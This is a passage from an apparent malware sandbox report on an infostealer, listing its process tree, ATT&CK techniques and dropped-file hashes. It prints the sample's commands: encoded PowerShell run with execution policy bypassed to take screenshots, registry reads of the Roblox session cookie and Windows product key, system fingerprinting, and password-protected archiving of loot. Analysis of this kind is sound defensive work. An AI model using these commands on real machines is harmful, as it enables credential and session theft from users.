BiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5976
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3560
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\112mq45t\112mq45t.cmdline"
        5⤵
        
        PID:5816
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62F0.tmp" "c:\Users\Admin\AppData\Local\Temp\112mq45t\CSCD7795EB716FC409A8203F17483195A.TMP"
        6⤵
        
        PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6040
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6060
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2988
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:928
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\6aKgj.zip" *"
    3⤵
    PID:5552
  - - C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\6aKgj.zip" *
      4⤵
      Executes dropped EXE
      PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:6060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:6056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2624dcf8,0x7ffc2624dd04,0x7ffc2624dd10
  2⤵
  PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1424,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1968 /prefetch:11
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1940,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:3336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2340,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2400 /prefetch:13
  2⤵
  PID:5548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4180,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3192 /prefetch:9
  2⤵
  PID:5968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4540,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4480 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5320,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5376 /prefetch:14
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,8554575448822991391,1049222218405092716,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5536 /prefetch:14
  2⤵
  PID:3724

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1000

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
414B

MD5
4c7740ea9663e9dcb87aae7d46368ce7

SHA1
9ec4b1629d1e6342be792bd80e16521b79434667

SHA256
1c41fc8d859e1830a6b2a1203343b24be08dadfb343cc3402bc74e1054641820

SHA512
7fcb240b02f424267a8f0b70b1cb1be0e3f9bb33215902e5bebfc7756e9a09bc6a63073b93b0a6d4e826a1841568b3ee969c8065d6bfa3c8b830954edfbe3e32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
54f26f7f620b63d4aecac968b5a28492

SHA1
430f52eaaa2d919a81b31b5d4c83f0107f3e226c

SHA256
056e4f1b5f92aa990b2a449f49b2ecfa7fc6912d717e318718c50d96566a7095

SHA512
61ad3e40dce00a5b089e58cee900deeb684f725c43c3b447a7f222ec4777900417f2bb3e078c7130f19586643d02351baf9346106b1b809738bead0d947f690b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
39b1cc5d7dc96984dbb49d9f896998ce

SHA1
f93ca5f653d623391b4b513135d277be236c5edc

SHA256
4694b45efa563a7e65a12a0aca5463475ed43d44c5e7984416c7dbf54bce4ca0

SHA512
5a17dff5d20b3b824623096a317247554a173f58fa6141fce286d8d019625787c27bd9cb78837558f11c2127a2d30fcc69849b455f68f1f77be8facac0d7535d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
153KB

MD5
c8aa33e34046c39a3831f04332dd4bf4

SHA1
830c55e6f363e1f5ef14aae3f3f941a76d6eab2c

SHA256
863798e904c87ef7d569f52a396532b46fb0b69ca972d43a4499b8b9193037e0

SHA512
96320676873700f48cb78fb07301d2369d4e6bd1052f7cc5e3c27bbe925308431bce24f4ff34184a8f4e8a7acf52fd6750a22cf156acedb382daac242625945b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
ddeb4c378ccb6de0980ba0c5b72078b1

SHA1
5dafb2b1849da70f91b44be00ffbd8092050b3d9

SHA256
bba70b217015caff6dc7ceecb632e2e54bc783c87509e69382b10668d0fe056a

SHA512
b2e42d112cb19b6eddd55d161c9bd8df008d4023b9283e139949d22fa12b72a515160525663c18a4b2c46e3c623e0f37d792921a0320dfbdcc1116340910b5c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
26b5e6625281888a764e888044596755

SHA1
eac43a7468a49cbff38ff0f7b4c8894063839f0d

SHA256
e4402043e2fd893401e38074bfb5e97d92b73d971f5ce0c2c2fdf021c8057749

SHA512
396ae79306f7996d2b6a4ac38ade3b5369abed414e498c152846cc03c0fa62b3029d446140d20fa394e9dd38c9a0cc3a14ca634a74fd77839c969af9259c0140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57083a8e45ebe4fd84c7c0f137ec3e21

SHA1
857b5ea57f7bcf03cadee122106c6e58792a9b84

SHA256
f20102c4dc409cad3cdaf7a330c3a18a730a9d7d902b9fbee2a84186cba93d40

SHA512
4bbc21c07c05ee1f783242f0fb59324d5ff9ae18bdf892f02980d582fed83380888eeba58e1a6a321507cfd5d4fe82a328a0d3482b29633be4e3ebbeac636f87

Download Submit
C:\Users\Admin\AppData\Local\Temp\112mq45t\112mq45t.dll

Filesize
4KB

MD5
8b907bce67f99e2d6095f70647e06379

SHA1
213b3f81828db057a650671a2752c2972c8b79d8

SHA256
6cef20857543985e1eeca3d297d06966f6a2d3acb5f99c1235cbf1639d124d49

SHA512
838e09b86ff7b203bcbfb903e95b0664abe8167db0d6621837d5c5a0d1bb62f072d341401b197773b08e5148428fb59ed11e6a18e58951a34b36e450be1b1412

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES62F0.tmp

Filesize
1KB

MD5
a67a70fa71eeb477295c80640583827d

SHA1
6724b3784f33a1f71c0a4bc0cfeccb5095aed96e

SHA256
2d98b388e740ddbbe70811c771442c0b19c9a3ad985f38ba93d89929ea77c395

SHA512
35cd2662be4cb310e432c1142740fa450c7be0bb327a972ae9b9e79684eff2a4dd28b079fda30568ac997d3f02d9ffd7330c64073af7776f0fc3ef3aae427a6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\VCRUNTIME140.dll

Filesize
117KB

MD5
32da96115c9d783a0769312c0482a62d

SHA1
2ea840a5faa87a2fe8d7e5cb4367f2418077d66b

SHA256
052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4

SHA512
616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_bz2.pyd

Filesize
49KB

MD5
d445b66c80c38f484dfd22c5bc99bfd6

SHA1
381644ec27f4874031401de9b994acfd8ddf6867

SHA256
44afb5ec148a9019f80e976c0649f9e4510cc4fc327b40019cd79cc019f6f6e6

SHA512
b25c142eb61246ed758e3cd347e32b22b34b3c7558e9929d9710433b6130e52d8a8f6906d1f69a2752771358967a945db9f064f1d0a6ab9db5eecbe33c2df8c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_ctypes.pyd

Filesize
64KB

MD5
8ab8af95f0000bfd777d2e9832414d71

SHA1
a848d37a9a4bab18d5f90376a0098189dc653232

SHA256
2a94e57d22451726434544e1f8082c0e379e4ba768bfe7f7ada7db1d5b686045

SHA512
adbb5cc31d5ed019d4a5f527d7af14142cb200cf9497de9f1e36219a5db61abfb9b0a1799bce7c7c8c2ae36612420e95a38a6cf3119b5a0653ed3b9aa1a56dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_decimal.pyd

Filesize
118KB

MD5
423d3c24a162c2f70e9862a446c5969a

SHA1
af94fc884d7abababf511a51d236962268e9be78

SHA256
eca8f9814896d44fb6f2ec31d1230b777be509f7f41640b7680df6f609e4de9c

SHA512
75c4b5119ca8b32d633a647d2adccb8c43857de523d4cb7a8c7b9d3c1f45e927f1efcfee26ab8fc7741bf83eef30c4dc4c558be40eff1e03f060b6cecf77d123

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_hashlib.pyd

Filesize
36KB

MD5
5f64eb23eed56e87b1e21f0790e59ba0

SHA1
95c5c3b7a6f322c07fe2dcdb3956bad7a5c35e09

SHA256
c3668794821c205b7de2ae1dd4c1feda18e2070a2ecc9ed6b6699234d5fc6b60

SHA512
494c5466c8971d64a4489b939bbb2978676b4abd7836478ac90bd09e7e084ddd5b4f459aeba588d12fbebceaca0d7fcd5f900172bad41c16f2d7f78c48c17490

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_lzma.pyd

Filesize
87KB

MD5
04ae3bb5f79fc405c70ab54645778c5a

SHA1
16b37028d52088ee4aa7966f1748b5f74d23409b

SHA256
dfe06ccb200a88e14cbdb9ebce03f704c0681f258187a19e638ce63290439194

SHA512
6fe41755c1b2cc2e363bb92ab8633f28f4e4938c88b7356b931e1f3511e68cd80693d71c729e233eadbef87e055538b8776d20ed54b64a2ae2df457d4acc840e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12402\_queue.pyd

Filesize
28KB

MD5
092de95c7338c37287b5ab0d580b26a1

SHA1
64b128f4deab8ec80be1b7eab3168b7af02d405b

SHA256
